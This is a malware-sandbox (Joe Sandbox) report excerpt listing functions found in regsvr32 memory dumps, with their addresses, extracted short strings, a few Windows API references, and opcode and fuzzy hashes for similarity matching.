Opcode ID: 50c5b638cfa811fde29b0e85a03895590e6a07254708670b8b7788fc37848ed5
Instruction ID: c88364cd0051417b22c4e6e08f7d2a5597ce7cc4ab847c1928468fd6ab274b60
Opcode Fuzzy Hash: 50c5b638cfa811fde29b0e85a03895590e6a07254708670b8b7788fc37848ed5
Instruction Fuzzy Hash: 7E21FB52B0EAC54FE755EB2848B11A4BBA0FF57650B4905FBD088C72D3DD2DB8458B82

Function 00007FFD3435A962 Relevance: 2.6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435A9BB
@3A4, xrefs: 00007FFD3435A9E4

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: a195634d9adfa7e964f026ebe804d94f7633fc3686df8152863a46e35eea70e8
Instruction ID: b0b76b8467290a3eed88120e768b04dcc74fda67867ea4fc979f83cc83c7061b
Opcode Fuzzy Hash: a195634d9adfa7e964f026ebe804d94f7633fc3686df8152863a46e35eea70e8
Instruction Fuzzy Hash: A0219062B5881D4FEB94FB5C94A26ECB7E1EF99320B0402BAE50DD3286CE3C384157D1

Function 00007FFD34556FCC Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34557055
+^4, xrefs: 00007FFD3455701F

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$+^4
API String ID: 0-1721650127
Opcode ID: f7da525affcaa08dd079758d53350e43ad0c13a12631397ebad683c2f4561cb9
Instruction ID: 2bfa353208fe7d4508855a668f2506735e7d2a5a005229220264c373227eb88b
Opcode Fuzzy Hash: f7da525affcaa08dd079758d53350e43ad0c13a12631397ebad683c2f4561cb9
Instruction Fuzzy Hash: A221C232F1895D4FEB85EBA884A66BDB7E1FF89310F4401B7D50DD3292DE2CA8415781

Function 00007FFD343677DC Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343677F0
@3A4, xrefs: 00007FFD34367892

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: 8f0c6f453324e7cc8d14478c202f3fce2dc197459743eb27f95aff41f4a1c970
Instruction ID: a65317ce6c3e12fa8d7f99ed90dc5a333b67b0f4e3ce69bc2fa8e30ac470a5cd
Opcode Fuzzy Hash: 8f0c6f453324e7cc8d14478c202f3fce2dc197459743eb27f95aff41f4a1c970
Instruction Fuzzy Hash: B5312130A585598FDB94FB54C8E2BA8B3E1FB99314F5401B9D00ED7292DE3C6C81DB41

Function 00007FFD3435E20C Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD3435E25C
@3A4, xrefs: 00007FFD3435E228

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$_
API String ID: 0-1391310414
Opcode ID: ea02b481187b74de3e9ae35f5fee8da2bd846674c7fb862fb14203b3a8439d1d
Instruction ID: 05b80060002a9e508656aa516e721543e339cf33d290e9487335a30bd2fcc6bd
Opcode Fuzzy Hash: ea02b481187b74de3e9ae35f5fee8da2bd846674c7fb862fb14203b3a8439d1d
Instruction Fuzzy Hash: F4F0E901B4EA9706F769776468B31716AC0DB57300F0801FAC948C71CBDC6D7C465386

Function 00007FFDA339DAC0 Relevance: 2.5, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA33DFE90: GetOverlappedResult.KERNEL32(00000000,?,00000000,?,00007FFDA339DAD4,?,00000000,?,00007FFDA33DFB7A), ref: 00007FFDA33DFED1

CloseHandle.KERNEL32(?,00000000,?,00007FFDA33DFB7A), ref: 00007FFDA339DAD8
CloseHandle.KERNEL32(?,00000000,?,00007FFDA33DFB7A), ref: 00007FFDA339DAE1

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CloseHandle$OverlappedResult
String ID:
API String ID: 953004297-0
Opcode ID: 1adeb1c753193930ca63ec45b27ee3b36d352086f62141c03ebabb4f064deb36
Instruction ID: 7f56b1680b44f7853017a4f90d9c2475f3be2fea4d015819f89aefd04ce7348c
Opcode Fuzzy Hash: 1adeb1c753193930ca63ec45b27ee3b36d352086f62141c03ebabb4f064deb36
Instruction Fuzzy Hash: BFE08643B0994586F630B662F4612BE6321AF88790F044032DFDD57BD38D2EE4828B14

Function 02DD0D7C Relevance: 2.3, APIs: 1, Instructions: 1032memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02DD1369

Memory Dump Source

Source File: 00000009.00000002.3361045403.0000000002D80000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d80000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8b5c64e0111f0c9f7a75e77ea5bdc65aabc36e30693f977857ec78a3b3b05715
Instruction ID: 37700f26f4df3e15636b8822ed95574bb785218398e694b7707f6ea3383149b4
Opcode Fuzzy Hash: 8b5c64e0111f0c9f7a75e77ea5bdc65aabc36e30693f977857ec78a3b3b05715
Instruction Fuzzy Hash: C562C260B6CE458BCB2C552C44E4339A291FF85B0AF64592EF49BC7B61E721DC85CB82

Function 00007FFD343536C2 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

M_L, xrefs: 00007FFD34353874

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: M_L
API String ID: 0-290739141
Opcode ID: 046866ca210f635b2a3cef4191d6250a0271ed2e687d06cc130952f84d535099
Instruction ID: 22cc10df6b1450a8331f3f176829212ad7c3cc44e273a8e4fd58f5062195d88d
Opcode Fuzzy Hash: 046866ca210f635b2a3cef4191d6250a0271ed2e687d06cc130952f84d535099
Instruction Fuzzy Hash: 078160317189098FDB98EB1CD499A6977E2FF99311B1502BAE04EC73A2DE34FC418B41

Function 00007FFD3435B0BA Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3437CACE

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 29b1fc90c429a173b86025089f34f945c8e87aa0bf71dde0aba75fde6a71555e
Instruction ID: 0d3252a208382820dfd8c70efc27de484aeae4fa712c6bbeb9f1513cf7e37a84
Opcode Fuzzy Hash: 29b1fc90c429a173b86025089f34f945c8e87aa0bf71dde0aba75fde6a71555e
Instruction Fuzzy Hash: A5310222B4C98D0FEB55FB2898A51B9BBE0EF86210F4441F6D54DC3292ED3C79428742

Function 00007FFD3435F792 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343637EF

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 1dcdbdc74c117dbac193df6ed402918a591b264a4463b61e3b2e145a1556abac
Instruction ID: bba5b84fdd2202558f40e4cd7b722776d714ca2c7b4111f19dd8944fa64ed32d
Opcode Fuzzy Hash: 1dcdbdc74c117dbac193df6ed402918a591b264a4463b61e3b2e145a1556abac
Instruction Fuzzy Hash: 81318E6275DAC60FE790A65CA8E83B5B7D4EB96331F4401BBE94CC3192D92ED485C342

Function 00007FFD343616DC Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34361703

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 648ff0ee088856e5c8165d1283ea6cf183a65806b1a5cd2e35362ff8c3f0051b
Instruction ID: ad77d46ffa2c94eba6ab9e7fb46da7e82261da4f54b1f738cb1a8a26594575fa
Opcode Fuzzy Hash: 648ff0ee088856e5c8165d1283ea6cf183a65806b1a5cd2e35362ff8c3f0051b
Instruction Fuzzy Hash: 30214E12B5DD5B0BFA68F65C68E55B577D1EB8627074403BAD18DC3383DC2DBC029281

Function 00007FFD3435CD20 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435CDD5

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: edada9f6d4654e752820f21293303735a61fd8c2e1987e7cff7ef8efdc00ffaa
Instruction ID: 85fd09cb61fc3da5b36ccd4510de6ae840c4fdaa42aae7f1cae8c38c8b7ed3a2
Opcode Fuzzy Hash: edada9f6d4654e752820f21293303735a61fd8c2e1987e7cff7ef8efdc00ffaa
Instruction Fuzzy Hash: 9B310921B4DF8C0FE755A66C58A91B5BFE0EBAB215B0402FBD448C32A2DD2978498342

Function 00007FFD34360155 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34361703

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: f57c0f9dcc272246f6a325e1c784e7e70bff472bf2e42d2ec36e3dcdae917477
Instruction ID: f71bc45637fac10caaeb2a0340d0b29f35d8b80e92f83d1a7defb1640f152d0c
Opcode Fuzzy Hash: f57c0f9dcc272246f6a325e1c784e7e70bff472bf2e42d2ec36e3dcdae917477
Instruction Fuzzy Hash: 68210A22B5DD5B0BFAA8F65CA8E65B573D1EF8A270754027AD18DC3387DC2D7C029281

Function 00007FFD3436C4EC Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

_L_L, xrefs: 00007FFD3436C572

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: _L_L
API String ID: 0-2313418860
Opcode ID: 136c88e60e2e1eb558c19a9ce744270b7f4a4c6d87c74ff67eb3d50966ab258a
Instruction ID: 788aab844646dbfda4164ae9d3df1d7fd8993d79d624ad8b261b393af895be48
Opcode Fuzzy Hash: 136c88e60e2e1eb558c19a9ce744270b7f4a4c6d87c74ff67eb3d50966ab258a
Instruction Fuzzy Hash: 7E210B12B5D94A0BF668F25E6CE51B537C2EB9627074402BAD14DC3293DC2D7C429251

Function 00007FFD3455A38C Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3455A424

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 15bbe8e764c2f4d90413eccfb69c5313c7feb3acf58ee54810c6b838623879d5
Instruction ID: 94561a03b720f29368ad2bb07e1e0e501852ac0e79a076fbade453c75c07d50d
Opcode Fuzzy Hash: 15bbe8e764c2f4d90413eccfb69c5313c7feb3acf58ee54810c6b838623879d5
Instruction Fuzzy Hash: 24213031F1890D4FDB95EB5C94A56FD77E1EB99310F04027AD14ED3291DE28A8429781

Function 00007FFD3435B570 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

X'E4, xrefs: 00007FFD3435B60B

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: X'E4
API String ID: 0-3192252353
Opcode ID: f04469509d3942f541be389e474b3f81b50ab8c6f8910f6c8c95f177c1d5f5a3
Instruction ID: 1cc0ebd2ddc64a7d1fd6c2dc212d64e78ccc0feebbcf694300c93ca7d26bf40a
Opcode Fuzzy Hash: f04469509d3942f541be389e474b3f81b50ab8c6f8910f6c8c95f177c1d5f5a3
Instruction Fuzzy Hash: 3E21E122A0E5891FEB55F77894E61EA7BE0EF03214B4805FAD088CB183ED3D79458742

Function 00007FFD345558FA Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD345559FB

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 205a6e09d388bd29fd13d83ba47a350ccd9ef7c2a50e30bca2413561529887a9
Instruction ID: ec523814767a1653b3f67cd8a4262fa7f2cefd51c9331d947dbc9a14d629e33a
Opcode Fuzzy Hash: 205a6e09d388bd29fd13d83ba47a350ccd9ef7c2a50e30bca2413561529887a9
Instruction Fuzzy Hash: 4E213D72E0D58E5AEBA5DF78D8AA0F97BE0FF52360F04017AE54AD3587ED1CA901C241

Function 00007FFD3436A525 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3437CEA3

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 398a054182afb7b5d9acca77b77070e5b04d2c9e7dfea0f996f479d5844a87ec
Instruction ID: cf58b0ab61102a8685cc8b04fc65f42206a7cc2b4c66ec05dcab1527a17275c6
Opcode Fuzzy Hash: 398a054182afb7b5d9acca77b77070e5b04d2c9e7dfea0f996f479d5844a87ec
Instruction Fuzzy Hash: AF110612B4C9870BEA65B75CA8F25FA6B90EF9723170441B7D1CDC3287DC1D68469381

Function 00007FFD34361868 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343618A2

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 42b6b207fcbe6a6203588ef22bf587118d36d5a050066385015a873145166cb4
Instruction ID: ca52b19f02d318ba3c43f4c537656fe6281c6fca1cb073d24bd49b7d64897100
Opcode Fuzzy Hash: 42b6b207fcbe6a6203588ef22bf587118d36d5a050066385015a873145166cb4
Instruction Fuzzy Hash: 64012612B5E9970FEB49F76D48F517467D2EB9A22470401BBD18CC3292DC2CAC05A342

Function 00007FFD343825F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3438261F

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: a8cba77fcf1018117156a443bf633ea3f6428bd3e7c87f66ce744c1c73f6b296
Instruction ID: d9dfc924d2b6a8d0ce96a2bdbadb65ee8b8db01f23ad5e83ab9fa9e9f35a160c
Opcode Fuzzy Hash: a8cba77fcf1018117156a443bf633ea3f6428bd3e7c87f66ce744c1c73f6b296
Instruction Fuzzy Hash: 4501DB21B28D4A0BEBADF7AD94E55B6B2D5EFD5220740067AE04EC3386DC6DE8458341

Function 00007FFD3435CDB1 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435CDD5

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 1c5a8f031b21979e427a82ee7acf3e0ad635483a47c53461b680e89eaa0410dd
Instruction ID: 4b05b776a5f434bd97141f424cd60a5e6f7211a083466a8b477d2e80140f7a48
Opcode Fuzzy Hash: 1c5a8f031b21979e427a82ee7acf3e0ad635483a47c53461b680e89eaa0410dd
Instruction Fuzzy Hash: 52F0C851B4DB8D0FE745A6BC6C652717BD0EB9A225B0802FFE44CC32A3DC6D68494396

Function 00007FFD3435B1C1 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3437CACE

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: e7d661b4b23a249f6b4b5df2a7bc1461497d8871c13a1b85c4c2739dfab8c47e
Instruction ID: bed0b6047c9ae4d6d0ce1d3f100795ee9a03428f04b8810c63d966d6b5ea37f7
Opcode Fuzzy Hash: e7d661b4b23a249f6b4b5df2a7bc1461497d8871c13a1b85c4c2739dfab8c47e
Instruction Fuzzy Hash: 9501F122A0DBC60FE756E7288C715997FB0AF93220B0A40F7C089C7193E92C68458342

Function 00007FFD345571DD Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34557201

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 179a7f86023fa343bf657a2aa1afaca28d2c732f51ca6a2d2525e408193172ab
Instruction ID: b200ae7baa300b489e1adebb363b5a2401b7b4bb185d6124e1b8fc2c332266d9
Opcode Fuzzy Hash: 179a7f86023fa343bf657a2aa1afaca28d2c732f51ca6a2d2525e408193172ab
Instruction Fuzzy Hash: FDF0C811B0EBC90FE78A966C5865174BF90DB9B11070906FBD489C71A3DC5C98454352

Function 00007FFD3436328D Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343632B1

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: c20a6ca56a6340e4e3e692ab224fb25146d73099380b1d83d785d418f61aecd6
Instruction ID: 76f13e75b64f705f3696e700e71bd32b4ba0ab22ea7416895b3b292e80a63ac8
Opcode Fuzzy Hash: c20a6ca56a6340e4e3e692ab224fb25146d73099380b1d83d785d418f61aecd6
Instruction Fuzzy Hash: DCF0F61170DBC50FE34A626C5C652617FE0DBAB130B0902FBE44CD72E7C85C0C458362

Function 00007FFD34365308 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436532C

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 338ce253f3a4a1a142d268f2c098e57a6209d23d6bd1043a0b92a350b188b18d
Instruction ID: 6f9e72242c39045c2995a58a5063515e31636472189c0048176ffb27016b23a9
Opcode Fuzzy Hash: 338ce253f3a4a1a142d268f2c098e57a6209d23d6bd1043a0b92a350b188b18d
Instruction Fuzzy Hash: 6FF02E12A6CBC60BE758677C18622A477C4EB8B634F440177D589C31C2DD9C6C414357

Function 00007FFD343527FA Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

P<A4, xrefs: 00007FFD34352821

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: P<A4
API String ID: 0-267273915
Opcode ID: 4a967e244c960ccdefb301caabdab9a4fb2dde63cc0640d5644f5386c6032e3e
Instruction ID: c031e42d0573cd7df0d3cd6d29f67d3aea75356f6e0be1022f6c040b5f3101a7
Opcode Fuzzy Hash: 4a967e244c960ccdefb301caabdab9a4fb2dde63cc0640d5644f5386c6032e3e
Instruction Fuzzy Hash: 51F02773A8C58D4FFB90AA5C94D60E97BD0FF52210F4040F7C508C7042ED3865974A80

Function 00007FFD34365A75 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343837F3

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 8bf1b2336ea0e1b9a6642a477b172c18494fe4960af808712b954c1430cfecac
Instruction ID: d6af44d511038b5abb64e3c40471ef33c8ef85e5368a453ba0bcd61719ab6454
Opcode Fuzzy Hash: 8bf1b2336ea0e1b9a6642a477b172c18494fe4960af808712b954c1430cfecac
Instruction Fuzzy Hash: BCF02E2175CC4E0FEDE8F35D88A19B5A3D0DFDA2107440176E50DC3385DC2EE8854385

Function 00007FFD3435F534 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435F54D

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: 1edfab3be52229e799ba19248503bbe6fa6574c9baeedee0345a289245fad737
Instruction ID: 3bfe336fe0ea1f82db0f80104b33fd02bf5bc1675b6cd570881fb357be485320
Opcode Fuzzy Hash: 1edfab3be52229e799ba19248503bbe6fa6574c9baeedee0345a289245fad737
Instruction Fuzzy Hash: 5CF0E211A4D9890FE75CA66C58612A0B7C0EB8A234B0806BBD18CC32C2DD2C68824396

Function 00007FFD34365AD5 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34373B2C

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4
API String ID: 0-1420514841
Opcode ID: c5bcfb435ac4e16852b0ddc8424069ac0049310a308b9d55bcde74373ca6b8e7
Instruction ID: 3d846f8cff5580f79e232bde0faca54db069e4fa991f81e1127e351486403121
Opcode Fuzzy Hash: c5bcfb435ac4e16852b0ddc8424069ac0049310a308b9d55bcde74373ca6b8e7
Instruction Fuzzy Hash: 74E02B21B6D9954AE71C765DAC657A976C4E7CE710F44023BF48CC32C2DC5C688152DB

Function 00007FFD34554319 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46e58f73c5de578b66349d143c0eadc56d7f0b788aea881ec56ddf67afb4254
Instruction ID: 878ffe6c223da4fa0b090d85520ac8aad3fdd4205b8b6c16bedf5705a01a4011
Opcode Fuzzy Hash: c46e58f73c5de578b66349d143c0eadc56d7f0b788aea881ec56ddf67afb4254
Instruction Fuzzy Hash: B2F1D331A18A498FDB99DF18C4A4BB977E1FF5A315F1401BAD54EC7292CA39F842CB40

Function 00007FFD34356DCC Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64f61cea94a2042ec862f636c341d569d96e25c0801f53c84e200ec1aff53508
Instruction ID: c8fa722846f686e3e86be5b5a5633a6ab7b56580365086b3fa2c6f12db731c84
Opcode Fuzzy Hash: 64f61cea94a2042ec862f636c341d569d96e25c0801f53c84e200ec1aff53508
Instruction Fuzzy Hash: 8BB1B430B489099FEB94FB58C495AB977E6FF99314F1042B9D01EC3292DE39B8428781

Function 00007FFD3452925D Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405ee3ecc997caaaf884aa387e8626c1d24e13042075186c7a8ebbbf531ed727
Instruction ID: 2dbcdbd0bf17d92ed45caa1a715a85354a6b0fd11e8e0bf299f373bab8aaa212
Opcode Fuzzy Hash: 405ee3ecc997caaaf884aa387e8626c1d24e13042075186c7a8ebbbf531ed727
